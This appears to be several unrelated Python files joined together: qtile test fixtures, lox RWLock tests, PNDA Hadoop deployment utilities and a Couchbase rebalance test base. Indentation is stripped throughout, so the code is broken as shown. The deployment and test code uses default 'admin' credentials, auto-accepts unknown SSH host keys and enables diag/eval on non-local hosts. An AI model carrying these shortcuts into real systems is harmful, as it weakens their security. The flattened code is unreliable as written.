from libqtile.log_utils import init_log
from libqtile.resources import default_config
# the default sizes for the Xephyr windows
WIDTH = 800
HEIGHT = 600
SECOND_WIDTH = 640
SECOND_HEIGHT = 480
max_sleep = 5.0
sleep_time = 0.1
def pytest_addoption(parser):
parser.addoption(
"--debuglog", action="store_true", default=False, help="enable debug output"
)
class Retry:
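    # Decorator that keeps calling the wrapped function until it succeeds or `tmax`
    # seconds have passed, sleeping `dt` between attempts and growing the delay by 1.5x.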
def __init__(self, fail_msg='retry failed!', ignore_exceptions=(),
dt=sleep_time, tmax=max_sleep, return_on_fail=False):
self.fail_msg = fail_msg
self.ignore_exceptions = ignore_exceptions
self.dt = dt
self.tmax = tmax
self.return_on_fail = return_on_fail
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
tmax = time.time() + self.tmax
dt = self.dt
ignore_exceptions = self.ignore_exceptions
while time.time() <= tmax:
try:
return fn(*args, **kwargs)
except ignore_exceptions:
pass
except AssertionError:
break
time.sleep(dt)
dt *= 1.5
if self.return_on_fail:
return False
else:
raise AssertionError(self.fail_msg)
return wrapper
@Retry(ignore_exceptions=(xcffib.ConnectionException,), return_on_fail=True)
def can_connect_x11(disp=':0', *, ok=None):
if ok is not None and not ok():
raise AssertionError()
conn = xcffib.connect(display=disp)
conn.disconnect()
return True
@Retry(ignore_exceptions=(ipc.IPCError,), return_on_fail=True)
def can_connect_qtile(socket_path, *, ok=None):
if ok is not None and not ok():
raise AssertionError()
ipc_client = ipc.Client(socket_path)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
client = command.client.InteractiveCommandClient(ipc_command)
val = client.status()
if val == 'OK':
return True
return False
def whereis(program):
"""Search PATH for executable"""
for path in os.environ.get('PATH', '').split(':'):
if os.path.exists(os.path.join(path, program)) and \
not os.path.isdir(os.path.join(path, program)):
return os.path.join(path, program)
return None
class BareConfig(Config):
auto_fullscreen = True
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("b"),
libqtile.config.Group("c"),
libqtile.config.Group("d")
]
layouts = [
libqtile.layout.stack.Stack(num_stacks=1),
libqtile.layout.stack.Stack(num_stacks=2)
]
floating_layout = libqtile.resources.default_config.floating_layout
keys = [
libqtile.config.Key(
["control"],
"k",
lazy.layout.up(),
),
libqtile.config.Key(
["control"],
"j",
lazy.layout.down(),
),
]
mouse = []
screens = [libqtile.config.Screen()]
follow_mouse_focus = False
class Xephyr:
"""Spawn Xephyr instance
    Set up a Xephyr instance with the given parameters. The Xephyr instance
must be started, and then stopped.
"""
def __init__(self,
xinerama=True,
randr=False,
two_screens=True,
width=WIDTH,
height=HEIGHT,
xoffset=None):
self.xinerama = xinerama
self.randr = randr
self.two_screens = two_screens
self.width = width
self.height = height
if xoffset is None:
self.xoffset = width
else:
self.xoffset = xoffset
self.proc = None # Handle to Xephyr instance, subprocess.Popen object
self.display = None
self.display_file = None
def __enter__(self):
try:
self.start_xephyr()
except: # noqa: E722
self.stop_xephyr()
raise
return self
def __exit__(self, _exc_type, _exc_val, _exc_tb):
self.stop_xephyr()
def start_xephyr(self):
"""Start Xephyr instance
Starts the Xephyr instance and sets the `self.display` to the display
which is used to setup the instance.
"""
# get a new display
display, self.display_file = xcffib.testing.find_display()
self.display = ":{}".format(display)
# build up arguments
args = [
"Xephyr",
"-name",
"qtile_test",
self.display,
"-ac",
"-screen",
"{}x{}".format(self.width, self.height),
]
if self.two_screens:
args.extend(["-origin", "%s,0" % self.xoffset, "-screen",
"%sx%s" % (SECOND_WIDTH, SECOND_HEIGHT)])
if self.xinerama:
args.extend(["+xinerama"])
if self.randr:
args.extend(["+extension", "RANDR"])
self.proc = subprocess.Popen(args)
if can_connect_x11(self.display, ok=lambda: self.proc.poll() is None):
return
# we weren't able to get a display up
if self.proc.poll() is None:
raise AssertionError("Unable to connect to running Xephyr")
else:
raise AssertionError(
"Unable to start Xephyr, quit with return code "
f"{self.proc.returncode}"
)
def stop_xephyr(self):
"""Stop the Xephyr instance"""
# Xephyr must be started first
if self.proc is None:
return
# Kill xephyr only if it is running
if self.proc.poll() is None:
# We should always be able to kill xephyr nicely
self.proc.terminate()
self.proc.wait()
self.proc = None
# clean up the lock file for the display we allocated
try:
self.display_file.close()
os.remove(xcffib.testing.lock_path(int(self.display[1:])))
except OSError:
pass
class TestManager:
"""Spawn a Qtile instance
Setup a Qtile server instance on the given display, with the given socket
and log files. The Qtile server must be started, and then stopped when it
is done. Windows can be spawned for the Qtile instance to interact with
    via the various `.test_*` methods.
"""
def __init__(self, sockfile, display, debug_log):
self.sockfile = sockfile
self.display = display
self.log_level = logging.DEBUG if debug_log else logging.INFO
self.proc = None
self.c = None
self.testwindows = []
def start(self, config_class, no_spawn=False):
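        # Launch Qtile in a separate process; any startup traceback is reported back
        # through the pipe so the test can fail with a useful error message.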
rpipe, wpipe = multiprocessing.Pipe()
def run_qtile():
try:
kore = Core(display_name=self.display)
init_log(self.log_level, log_path=None, log_color=False)
Qtile(
kore,
config_class(),
socket_path=self.sockfile,
no_spawn=no_spawn,
).loop()
except Exception:
wpipe.send(traceback.format_exc())
self.proc = multiprocessing.Process(target=run_qtile)
self.proc.start()
# First, wait for socket to appear
if can_connect_qtile(self.sockfile, ok=lambda: not rpipe.poll()):
ipc_client = ipc.Client(self.sockfile)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
self.c = command.client.InteractiveCommandClient(ipc_command)
return
if rpipe.poll(sleep_time):
error = rpipe.recv()
raise AssertionError("Error launching qtile, traceback:\n%s" % error)
raise AssertionError("Error launching qtile")
def create_manager(self, config_class):
"""Create a Qtile manager instance in this thread
This should only be used when it is known that the manager will throw
an error and the returned manager should not be started, otherwise this
will likely block the thread.
"""
init_log(self.log_level, log_path=None, log_color=False)
kore = Core(display_name=self.display)
config = config_class()
for attr in dir(default_config):
if not hasattr(config, attr):
setattr(config, attr, getattr(default_config, attr))
return Qtile(kore, config, socket_path=self.sockfile)
def terminate(self):
if self.proc is None:
print("qtile is not alive", file=sys.stderr)
else:
# try to send SIGTERM and wait up to 10 sec to quit
self.proc.terminate()
self.proc.join(10)
if self.proc.is_alive():
print("Killing qtile forcefully", file=sys.stderr)
# desperate times... this probably messes with multiprocessing...
try:
os.kill(self.proc.pid, 9)
self.proc.join()
except OSError:
# The process may have died due to some other error
pass
if self.proc.exitcode:
print("qtile exited with exitcode: %d" % self.proc.exitcode, file=sys.stderr)
self.proc = None
for proc in self.testwindows[:]:
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
def create_window(self, create, failed=None):
"""
        Uses the function `create` to create a window.
Waits until qtile actually maps the window and then returns.
"""
client = self.c
start = len(client.windows())
create()
@Retry(ignore_exceptions=(RuntimeError,), fail_msg='Window never appeared...')
def success():
while failed is None or not failed():
if len(client.windows()) > start:
return True
raise RuntimeError("not here yet")
return success()
def _spawn_window(self, *args):
"""Starts a program which opens a window
        Spawns a new subprocess for a command that opens a window, given by the
        arguments to this method, and checks that qtile maps the new window.
"""
if not args:
raise AssertionError("Trying to run nothing! (missing arguments)")
proc = None
def spawn():
nonlocal proc
proc = subprocess.Popen(args, env={"DISPLAY": self.display})
def failed():
if proc.poll() is not None:
return True
return False
self.create_window(spawn, failed=failed)
self.testwindows.append(proc)
return proc
def _spawn_script(self, script, *args):
        d = os.path.dirname(os.path.realpath(__file__))
        python = sys.executable
path = os.path.join(d, "scripts", script)
return self._spawn_window(python, path, *args)
def kill_window(self, proc):
"""Kill a window and check that qtile unmaps it
Kills a window created by calling one of the `self.test*` methods,
ensuring that qtile removes it from the `windows` attribute.
"""
assert proc in self.testwindows, "Given process is not a spawned window"
start = len(self.c.windows())
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
@Retry(ignore_exceptions=(ValueError,))
def success():
if len(self.c.windows()) < start:
return True
raise ValueError('window is still in client list!')
if not success():
raise AssertionError("Window could not be killed...")
def test_window(self, name, type="normal"):
"""
Windows created with this method must have their process killed explicitly, no
matter what type they are.
"""
return self._spawn_script("window.py", self.display, name, type)
def test_dialog(self, name="dialog"):
return self.test_window(name, "dialog")
def test_notification(self, name="notification"):
return self.test_window(name, "notification")
def test_xclock(self):
path = whereis("xclock")
return self._spawn_window(path)
def test_xeyes(self):
path = whereis("xeyes")
return self._spawn_window(path)
def test_xcalc(self):
path = whereis("xcalc")
return self._spawn_window(path)
def groupconsistency(self):
groups = self.c.groups()
screens = self.c.screens()
seen = set()
for g in groups.values():
scrn = g["screen"]
if scrn is not None:
if scrn in seen:
raise AssertionError(
"Screen referenced from more than one group.")
seen.add(scrn)
assert screens[scrn]["group"] == g["name"]
assert len(seen) == len(screens), "Not all screens \
had an attached group."
@pytest.fixture(scope="session")
def xvfb():
with xcffib.testing.XvfbTest():
display = os.environ["DISPLAY"]
if not can_connect_x11(display):
raise OSError("Xvfb did not come up")
yield
@pytest.fixture(scope="session")
def display(xvfb): # noqa: F841
return os.environ["DISPLAY"]
@pytest.fixture(scope="session")
def xephyr(request, xvfb): # noqa: F841
kwargs = getattr(request, "param", {})
with Xephyr(**kwargs) as x:
yield x
@pytest.fixture(scope="function")
def manager(request, xephyr):
config = getattr(request, "param", BareConfig)
for attr in dir(default_config):
if not hasattr(config, attr):
setattr(config, attr, getattr(default_config, attr))
with tempfile.NamedTemporaryFile() as f:
sockfile = f.name
try:
manager = TestManager(sockfile, xephyr.display, request.config.getoption("--debuglog"))
manager.start(config)
yield manager
finally:
manager.terminate()
@pytest.fixture(scope="function")
def manager_nospawn(request, xephyr):
with tempfile.NamedTemporaryFile() as f:
sockfile = f.name
try:
manager = TestManager(sockfile, xephyr.display, request.config.getoption("--debuglog"))
yield manager
finally:
manager.terminate()
no_xinerama = pytest.mark.parametrize("xephyr", [{"xinerama": False}], indirect=True)
|
test_RWLock.py
|
import threading
from lox import RWLock
from copy import copy
from time import sleep, time
from collections import deque
SLEEP_TIME = 0.01
N_WORKERS = 5
rw_lock = None
resource = None
resp = None
def common_setup():
global rw_lock, resp
rw_lock = RWLock()
resp = deque()
def common_create_workers(func, n, *args):
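    # Spawn n threads running func(*args); returns the threads and the time just before they started.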
threads = []
for i in range(n):
t = threading.Thread(target=func, args=args)
threads.append(t)
t_start = time()
for t in threads:
t.start()
return threads, t_start
def read_worker():
global rw_lock, resp
with rw_lock('r'):
local_copy = copy(resource)
sleep(SLEEP_TIME)
resp.append(local_copy)
return
def write_worker(val):
global rw_lock, resource
with rw_lock('w'):
resource = val
return
def test_RWLock_r():
global rw_lock, resource, resp
common_setup()
resource = 0
threads, t_start = common_create_workers(read_worker, N_WORKERS)
for t in threads:
t.join()
t_end = time()
t_diff = t_end-t_start
assert(N_WORKERS > 2)
# for this to be true, readers have to access at same time (good)
assert(t_diff < (N_WORKERS-1)*SLEEP_TIME)
for r in resp:
assert(r == resource)
def test_RWLock_w():
global rw_lock, resource
common_setup()
resource = 0
new_val = 5
threads_w1, t_start_w1 = common_create_workers(write_worker, 1, new_val)
for t in threads_w1:
t.join()
assert(resource == new_val)
def test_RWLock_rw():
global rw_lock, resource, resp
common_setup()
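    # NOTE: the read/write ordering check below is currently skipped by this early return.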
return
resource = 0
soln = [0, ]*N_WORKERS + [5, ]*N_WORKERS
threads_r1, t_start_r1 = common_create_workers(read_worker, N_WORKERS)
threads_w1, t_start_w1 = common_create_workers(write_worker, N_WORKERS, 5)
threads_r2, t_start_r2 = common_create_workers(read_worker, N_WORKERS)
for t in threads_r1:
t.join()
for t in threads_w1:
t.join()
for t in threads_r2:
t.join()
for r, s in zip(resp, soln):
assert(r == s)
def test_RWLock_timeout():
lock = RWLock()
assert(lock.acquire('r', timeout=0.01) is True)
assert(lock.acquire('w', timeout=0.01) is False)
assert(lock.acquire('r', timeout=0.01) is True)
lock.release('r')
lock.release('r')
assert(lock.acquire('w', timeout=0.01) is True)
assert(lock.acquire('w', timeout=0.01) is False)
assert(lock.acquire('r', timeout=0.01) is False)
lock.release('w')
def test_bathroom_example():
    # Note: after the janitor exits, the order in which the remaining people enter is nondeterministic
sol = [
"p_0_enter",
"p_0_exit",
"j_enter",
"j_exit",
]
res = bathroom_example()[:4]
for r, s in zip(res, sol):
assert(r == s)
def bathroom_example():
"""
Scenario:
A janitor needs to clean a restroom, but is not allowed to enter until
all people are out of the restroom. How do we implement this?
"""
restroom = RWLock()
res = []
n_people = 5
sleep_time = 0.1
def janitor():
with restroom('w'): # block until the restroom is no longer occupied
res.append('j_enter')
print("(%0.3f s) Janitor entered the restroom" % (time() - t_start,))
sleep(sleep_time) # clean the restroom
res.append('j_exit')
print("(%0.3f s) Janitor exited the restroom" % (time() - t_start,))
def people(id):
if id == 0: # Get the starting time of execution for display purposes
global t_start
t_start = time()
with restroom('r'): # block if a janitor is in the restroom
res.append("p_%d_enter" % (id,))
print("(%0.3f s) Person %d entered the restroom" % (time() - t_start, id,))
sleep(sleep_time) # use the restroom
res.append("p_%d_exit" % (id,))
print("(%0.3f s) Person %d exited the restroom" % (time() - t_start, id,))
people_threads = [threading.Thread(target=people, args=(i,)) for i in range(n_people)]
janitor_thread = threading.Thread(target=janitor)
for i, person in enumerate(people_threads):
person.start() # Person i will now attempt to enter the restroom
        sleep(sleep_time * 0.6)  # wait for 60% of the time a person spends in the restroom
if i == 0: # While the first person is in the restroom...
janitor_thread.start() # the janitor would like to enter. HOWEVER...
            # A new person (until all n_people are done) arrives every 0.06 seconds.
# Wait for all threads to finish
for t in people_threads:
t.join()
janitor_thread.join()
# The results will look like:
"""
Running Restroom Demo
(0.000 s) Person 0 entered the restroom
(0.100 s) Person 0 exited the restroom
(0.101 s) Janitor entered the restroom
(0.201 s) Janitor exited the restroom
(0.201 s) Person 1 entered the restroom
(0.202 s) Person 2 entered the restroom
(0.202 s) Person 3 entered the restroom
(0.243 s) Person 4 entered the restroom
(0.302 s) Person 1 exited the restroom
(0.302 s) Person 2 exited the restroom
(0.303 s) Person 3 exited the restroom
(0.343 s) Person 4 exited the restroom
"""
    # While Person 0 is in the restroom, the Janitor is already waiting to enter (from around 0.06 s).
    # While the Janitor is waiting, nobody else is let into the room.
    # After Person 0 leaves the room, the Janitor enters.
    # After cleaning, the Janitor leaves at around the 0.2 second mark.
    # Ever since the Janitor started waiting, Person 1, Person 2,
    # Person 3, and Person 4 have been lining up to enter.
    # Once the Janitor leaves the restroom, all the waiting people go in at the same time.
return res
if __name__ == "__main__":
print("Running Restroom Demo")
bathroom_example()
|
deployer_utils.py
|
"""
Name: deployer_utils.py
Purpose: Utility functions for general usage in the project
Author: PNDA team
Created: 21/03/2016
Copyright (c) 2016 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Apache License, Version 2.0 (the "License").
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
The code, technical concepts, and all information contained herein, are the property of Cisco Technology, Inc.
and/or its affiliated entities, under various laws including copyright, international treaties, patent,
and/or contract. Any use of the material herein must be in accordance with the terms of the License.
All rights not expressly granted by the License are reserved.
Unless required by applicable law or agreed to separately in writing, software distributed under the
License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied.
"""
import os
import tarfile
from io import BytesIO
import logging
import traceback
import time
from threading import Thread
import requests
import spur
from pywebhdfs.webhdfs import PyWebHdfsClient
def get_nameservice(cm_host, cluster_name, service_name, user_name='admin', password='admin'):
request_url = 'http://%s:7180/api/v11/clusters/%s/services/%s/nameservices' % (cm_host,
cluster_name,
service_name)
result = requests.get(request_url, auth=(user_name, password))
nameservice = ""
if result.status_code == 200:
response = result.json()
if 'items' in response:
nameservice = response['items'][0]['name']
logging.debug("Found named service %s for %s", nameservice, service_name)
return nameservice
def update_hadoop_env(env):
    # Update the env in a way that ensures values are only updated in the main descriptor and never removed
# so that any caller will always be able to query the values it expects to find in the env descriptor
# 1. copy the environment descriptor
# 2. update the temporary copy
# 3. push the temporary values into the main descriptor
tmp_env = dict(env)
logging.debug('Updating environment descriptor')
if env['hadoop_distro'] == 'CDH':
logging.error('CDH is not a supported hadoop distribution')
elif env['hadoop_distro'] == 'HDP':
fill_hadoop_env_hdp(tmp_env)
else:
logging.warning('Skipping update_hadoop_env for hadoop distro "%s"', env['hadoop_distro'])
logging.debug('Updated environment descriptor')
for key in tmp_env:
# Dictionary get/put operations are atomic so inherently thread safe and don't need a lock
env[key] = tmp_env[key]
logging.debug(env)
def monitor_hadoop_env(env, config):
while True:
try:
update_hadoop_env(env)
except Exception:
logging.error("Environment sync failed")
logging.error(traceback.format_exc())
sleep_seconds = config['environment_sync_interval']
logging.debug('Next environment sync will be in %s seconds', sleep_seconds)
time.sleep(sleep_seconds)
def fill_hadoop_env(env, config):
update_hadoop_env(env)
env_monitor_thread = Thread(target=monitor_hadoop_env, args=[env, config])
env_monitor_thread.daemon = True
env_monitor_thread.start()
def ambari_request(ambari, uri):
hadoop_manager_ip = ambari[0]
hadoop_manager_username = ambari[1]
hadoop_manager_password = ambari[2]
if uri.startswith("http"):
full_uri = uri
else:
full_uri = 'http://%s:8080/api/v1%s' % (hadoop_manager_ip, uri)
headers = {'X-Requested-By': hadoop_manager_username}
auth = (hadoop_manager_username, hadoop_manager_password)
return requests.get(full_uri, auth=auth, headers=headers).json()
def get_hdfs_hdp(ambari, cluster_name):
core_site = ambari_request(ambari, '/clusters/%s?fields=Clusters/desired_configs/core-site' % cluster_name)
config_version = core_site['Clusters']['desired_configs']['core-site']['tag']
core_site_config = ambari_request(ambari, '/clusters/%s/configurations/?type=core-site&tag=%s' % (cluster_name, config_version))
return core_site_config['items'][0]['properties']['fs.defaultFS']
def component_host(component_detail):
host_list = ''
for host_detail in component_detail['host_components']:
if host_list:
host_list += ','
host_list += host_detail['HostRoles']['host_name']
return host_list
def fill_hadoop_env_hdp(env):
hadoop_manager_ip = env['hadoop_manager_host']
hadoop_manager_username = env['hadoop_manager_username']
hadoop_manager_password = env['hadoop_manager_password']
ambari = (hadoop_manager_ip, hadoop_manager_username, hadoop_manager_password)
cluster_name = ambari_request(ambari, '/clusters')['items'][0]['Clusters']['cluster_name']
logging.debug('getting service list for %s', cluster_name)
env['cm_status_links'] = {}
env['name_node'] = get_hdfs_hdp(ambari, cluster_name)
services = ambari_request(ambari, '/clusters/%s/services' % cluster_name)['items']
for service in services:
service_name = service['ServiceInfo']['service_name']
env['cm_status_links']['%s' % service_name] = 'http://%s:8080/#/main/services/%s/summary' % (hadoop_manager_ip, service_name)
service_components = ambari_request(ambari, service['href'] + '/components')['items']
for component in service_components:
component_detail = ambari_request(ambari, component['href'])
role_name = component_detail['ServiceComponentInfo']['component_name']
if role_name == "NAMENODE":
env['webhdfs_host'] = '%s' % component_host(component_detail).split(',')[0]
env['webhdfs_port'] = '14000'
elif role_name == "RESOURCEMANAGER":
rm_host = component_host(component_detail)
if len(rm_host.split(',')) > 1:
main_rm_host = rm_host.split(',')[0]
backup_rm_host = rm_host.split(',')[1]
else:
main_rm_host = rm_host
backup_rm_host = None
env['yarn_resource_manager_host'] = '%s' % main_rm_host
env['yarn_resource_manager_port'] = '8088'
env['yarn_resource_manager_mr_port'] = '8050'
if backup_rm_host is not None:
                    env['yarn_resource_manager_host_backup'] = '%s' % backup_rm_host
env['yarn_resource_manager_port_backup'] = '8088'
env['yarn_resource_manager_mr_port_backup'] = '8050'
elif role_name == "NODEMANAGER":
env['yarn_node_managers'] = '%s' % component_host(component_detail)
elif role_name == "ZOOKEEPER_SERVER":
env['zookeeper_quorum'] = '%s' % component_host(component_detail)
env['zookeeper_port'] = '2181'
elif role_name == "HBASE_MASTER":
env['hbase_rest_server'] = '%s' % component_host(component_detail).split(',')[0]
env['hbase_rest_port'] = '20550'
env['hbase_thrift_server'] = '%s' % component_host(component_detail).split(',')[0]
elif role_name == "OOZIE_SERVER":
env['oozie_uri'] = 'http://%s:11000/oozie' % component_host(component_detail)
elif role_name == "HIVE_SERVER":
env['hive_server'] = '%s' % component_host(component_detail)
env['hive_port'] = '10001'
def tree(archive_filepath):
    # open() replaces the Python 2-only file() builtin; the context manager also
    # guarantees the archive handle is closed.
    with open(archive_filepath, 'rb') as file_handle:
        tar_file = tarfile.open(None, 'r', file_handle)
        table = tar_file.getmembers()
        root = {}
        for member in table:
            path = member.name.split('/')
            node = root
            for part in path:
                if part not in node:
                    node[part] = {}
                node = node[part]
        return root
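# Minimal usage sketch (hypothetical archive contents): tree() expands a tar archive's
# member names into a nested dict keyed by path components, e.g. {'pkg': {'app.properties': {}}}.
def _tree_example():
    import io
    import os
    import tempfile
    with tempfile.NamedTemporaryFile(suffix='.tar', delete=False) as tmp:
        with tarfile.open(fileobj=tmp, mode='w') as tar:
            tar.addfile(tarfile.TarInfo(name='pkg/app.properties'), io.BytesIO(b''))
        archive_path = tmp.name
    assert tree(archive_path) == {'pkg': {'app.properties': {}}}
    os.remove(archive_path)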
def canonicalize(path):
path = path.replace('\\', '/')
path = path.replace('//', '/')
return path
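# Minimal usage sketch (hypothetical path): canonicalize() normalizes Windows-style
# backslashes and doubled slashes so paths handed to WebHDFS are consistent.
def _canonicalize_example():
    assert canonicalize('apps\\pnda//package') == 'apps/pnda/package'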
class HDFS(object):
def __init__(self, host, port, user):
self._hdfs = PyWebHdfsClient(
host=host, port=port, user_name=user, timeout=None)
logging.debug('webhdfs = %s@%s:%s', user, host, port)
def recursive_copy(self, local_path, remote_path, exclude=None, permission=755):
if exclude is None:
exclude = []
c_path = canonicalize(remote_path)
logging.debug('making %s', c_path)
self._hdfs.make_dir(c_path, permission=permission)
fs_g = os.walk(local_path)
for dpath, dnames, fnames in fs_g:
_, relative_path = dpath.split(local_path)
for dname in dnames:
if dname not in exclude:
c_path = canonicalize(
'%s/%s/%s' %
(remote_path, relative_path, dname))
logging.debug('making %s', c_path)
self._hdfs.make_dir(c_path, permission=permission)
for fname in fnames:
if fname not in exclude:
                    data = open(
canonicalize(
'%s/%s/%s' %
(local_path, relative_path, fname)), 'rb')
c_path = canonicalize(
'%s/%s/%s' %
(remote_path, relative_path, fname))
logging.debug('creating %s', c_path)
self._hdfs.create_file(c_path, data, overwrite=True, permission=permission)
data.close()
def make_dir(self, path, permission=755):
logging.debug('make_dir: %s', path)
self._hdfs.make_dir(canonicalize(path), permission=permission)
def create_file(self, data, remote_file_path, permission=755):
logging.debug('create_file: %s', remote_file_path)
sio = BytesIO(data)
self._hdfs.create_file(
canonicalize(remote_file_path),
sio,
overwrite=True,
permission=permission)
def append_file(self, data, remote_file_path):
logging.debug('append to: %s', remote_file_path)
self._hdfs.append_file(canonicalize(remote_file_path), data)
def stream_file_to_disk(self, remote_file_path, local_file_path):
chunk_size = 10*1024*1024
offset = 0
with open(local_file_path, 'wb') as dest_file:
data = self._hdfs.read_file(canonicalize(remote_file_path), offset=offset, length=chunk_size)
while True:
dest_file.write(data)
if len(data) < chunk_size:
break
offset += chunk_size
data = self._hdfs.read_file(canonicalize(remote_file_path), offset=offset, length=chunk_size)
def read_file(self, remote_file_path):
data = self._hdfs.read_file(canonicalize(remote_file_path))
return data
def remove(self, path, recursive=False):
logging.debug('remove: %s', path)
self._hdfs.delete_file_dir(canonicalize(path), recursive)
def file_exists(self, path):
try:
self._hdfs.get_file_dir_status(path)
return True
except:
return False
def exec_ssh(host, user, key, ssh_commands):
shell = spur.SshShell(
hostname=host,
username=user,
private_key_file=key,
missing_host_key=spur.ssh.MissingHostKey.accept)
with shell:
for ssh_command in ssh_commands:
logging.debug('Host - %s: Command - %s', host, ssh_command)
try:
shell.run(["bash", "-c", ssh_command])
except spur.results.RunProcessError as exception:
logging.error(
ssh_command +
" - error: " +
traceback.format_exc(exception))
def dict_to_props(dict_props):
props = []
for key, value in dict_props.items():
props.append('%s=%s' % (key, value))
return '\n'.join(props)
def dict_to_xml(dict_props):
xml_header = '<?xml version="1.0" encoding="UTF-8" ?>'
xml_string = '<configuration>'
for key, value in dict_props.items():
xml_string += '<property>' + \
'<name>' + key + '</name>' + \
'<value>' + str(value) + '</value>' + \
'</property>'
xml_string += '</configuration>'
return xml_header + xml_string
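# Minimal usage sketch (hypothetical property): dict_to_props() renders a dict as
# Java-style key=value lines and dict_to_xml() renders it as a Hadoop <configuration>
# document.
def _properties_example():
    props = {'fs.defaultFS': 'hdfs://namenode:8020'}
    assert dict_to_props(props) == 'fs.defaultFS=hdfs://namenode:8020'
    assert dict_to_xml(props).startswith('<?xml version="1.0" encoding="UTF-8" ?>')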
|
swaprebalance.py
|
import time
import datetime
import unittest
from TestInput import TestInputSingleton
import logger
from couchbase_helper.cluster import Cluster
from membase.api.rest_client import RestConnection, RestHelper
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.cluster_helper import ClusterOperationHelper
from membase.helper.rebalance_helper import RebalanceHelper
from memcached.helper.data_helper import LoadWithMcsoda
from threading import Thread
from remote.remote_util import RemoteMachineShellConnection
from memcached.helper.data_helper import MemcachedClientHelper
from membase.api.exception import RebalanceFailedException
from basetestcase import BaseTestCase
from security.rbac_base import RbacBase
class SwapRebalanceBase(unittest.TestCase):
@staticmethod
def common_setup(self):
self.cluster_helper = Cluster()
self.log = logger.Logger.get_logger()
self.cluster_run = False
self.input = TestInputSingleton.input
self.servers = self.input.servers
serverInfo = self.servers[0]
rest = RestConnection(serverInfo)
if len({server.ip for server in self.servers}) == 1:
ip = rest.get_nodes_self().ip
for server in self.servers:
server.ip = ip
self.cluster_run = True
self.case_number = self.input.param("case_number", 0)
self.replica = self.input.param("replica", 1)
self.keys_count = self.input.param("keys-count", 1000)
self.load_ratio = self.input.param("load-ratio", 1)
self.ratio_expiry = self.input.param("ratio-expiry", 0.03)
self.ratio_deletes = self.input.param("ratio-deletes", 0.13)
self.num_buckets = self.input.param("num-buckets", 1)
self.failover_factor = self.num_swap = self.input.param("num-swap", 1)
self.num_initial_servers = self.input.param("num-initial-servers", 3)
self.fail_orchestrator = self.swap_orchestrator = self.input.param("swap-orchestrator", False)
self.do_access = self.input.param("do-access", True)
self.load_started = False
self.loaders = []
try:
# Clear the state from Previous invalid run
if rest._rebalance_progress_status() == 'running':
self.log.warning("rebalancing is still running, previous test should be verified")
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
self.log.info("============== SwapRebalanceBase setup was started for test #{0} {1}=============="\
.format(self.case_number, self._testMethodName))
SwapRebalanceBase.reset(self)
# Make sure the test is setup correctly
min_servers = int(self.num_initial_servers) + int(self.num_swap)
msg = "minimum {0} nodes required for running swap rebalance"
self.assertTrue(len(self.servers) >= min_servers, msg=msg.format(min_servers))
self.log.info('picking server : {0} as the master'.format(serverInfo))
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(self.servers)
info = rest.get_nodes_self()
rest.init_cluster(username=serverInfo.rest_username, password=serverInfo.rest_password)
rest.init_cluster_memoryQuota(memoryQuota=int(info.mcdMemoryReserved * node_ram_ratio))
SwapRebalanceBase.enable_diag_eval_on_non_local_hosts(self, serverInfo)
# Add built-in user
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin', self.servers[0])
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list, RestConnection(self.servers[0]), 'builtin')
if self.num_buckets > 10:
BaseTestCase.change_max_buckets(self, self.num_buckets)
self.log.info("============== SwapRebalanceBase setup was finished for test #{0} {1} =============="
.format(self.case_number, self._testMethodName))
SwapRebalanceBase._log_start(self)
except Exception as e:
self.cluster_helper.shutdown()
self.fail(e)
@staticmethod
def common_tearDown(self):
self.cluster_helper.shutdown()
test_failed = (hasattr(self, '_resultForDoCleanups') and len(self._resultForDoCleanups.failures or self._resultForDoCleanups.errors)) \
or (hasattr(self, '_exc_info') and self._exc_info()[1] is not None)
if test_failed and TestInputSingleton.input.param("stop-on-failure", False)\
or self.input.param("skip_cleanup", False):
self.log.warning("CLEANUP WAS SKIPPED")
else:
SwapRebalanceBase.reset(self)
SwapRebalanceBase._log_finish(self)
# Remove rbac user in teardown
try:
role_del = ['cbadminbucket']
RbacBase().remove_user_role(role_del, RestConnection(
self.servers[0]))
except:
pass
@staticmethod
def reset(self):
self.log.info("============== SwapRebalanceBase cleanup was started for test #{0} {1} =============="\
.format(self.case_number, self._testMethodName))
self.log.info("Stopping load in Teardown")
SwapRebalanceBase.stop_load(self.loaders)
for server in self.servers:
rest = RestConnection(server)
if rest._rebalance_progress_status() == 'running':
self.log.warning("rebalancing is still running, test should be verified")
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)
for server in self.servers:
ClusterOperationHelper.cleanup_cluster([server])
if server.data_path:
rest = RestConnection(server)
rest.set_data_path(data_path=server.data_path)
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self)
self.log.info("============== SwapRebalanceBase cleanup was finished for test #{0} {1} =============="\
.format(self.case_number, self._testMethodName))
@staticmethod
def enable_diag_eval_on_non_local_hosts(self, master):
"""
Enable diag/eval to be run on non-local hosts.
:param master: Node information of the master node of the cluster
:return: Nothing
"""
remote = RemoteMachineShellConnection(master)
output, error = remote.enable_diag_eval_on_non_local_hosts()
if "ok" not in output:
self.log.error("Error in enabling diag/eval on non-local hosts on {}. {}".format(master.ip, output))
raise Exception("Error in enabling diag/eval on non-local hosts on {}".format(master.ip))
else:
self.log.info("Enabled diag/eval for non-local hosts from {}".format(master.ip))
@staticmethod
def _log_start(self):
try:
msg = "{0} : {1} started ".format(datetime.datetime.now(), self._testMethodName)
RestConnection(self.servers[0]).log_client_error(msg)
except:
pass
@staticmethod
def _log_finish(self):
try:
msg = "{0} : {1} finished ".format(datetime.datetime.now(), self._testMethodName)
RestConnection(self.servers[0]).log_client_error(msg)
except:
pass
